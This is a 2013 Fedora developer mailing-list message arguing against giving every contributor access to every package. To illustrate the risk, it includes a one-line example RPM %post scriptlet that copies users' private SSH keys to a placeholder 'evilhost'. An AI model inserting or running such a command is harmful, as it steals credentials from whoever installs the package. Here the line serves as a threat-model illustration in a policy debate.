Question about "what to do if mantainer is absent"

Richard W.M. Jones rjones at redhat.com
Tue May 14 20:04:59 UTC 2013


On Tue, May 14, 2013 at 11:45:40AM -0600, Kevin Fenzi wrote:
> On Tue, 14 May 2013 17:13:54 +0000
> "J├│hann B. Gu├░mundsson" <johannbg at gmail.com> wrote:
> > What really is needed here is to drop the user ownership module 
> > altogether and allow every contribute access to every component or
> > use group ownership model on components instead followed by an email
> > address component at fedoraproject which is the components email address
> > and is stored in a imap folder.
> 
> There's a number of problems with 'free for all' model. Mostly around
> communication. 

I suspect the main one is someone putting:

%post
scp /home/*/.ssh/id_rsa evilhost:

into a commonly used package, or something equivalent but more subtle
than that.

Basically you're giving root access to everyone with a FAS packager
account (not that the current situation is that much better).

Rich.

-- 
Richard Jones, Virtualization Group, Red Hat http://people.redhat.com/~rjones
Read my programming blog: http://rwmj.wordpress.com
Fedora now supports 80 OCaml packages (the OPEN alternative to F#)


More information about the devel mailing list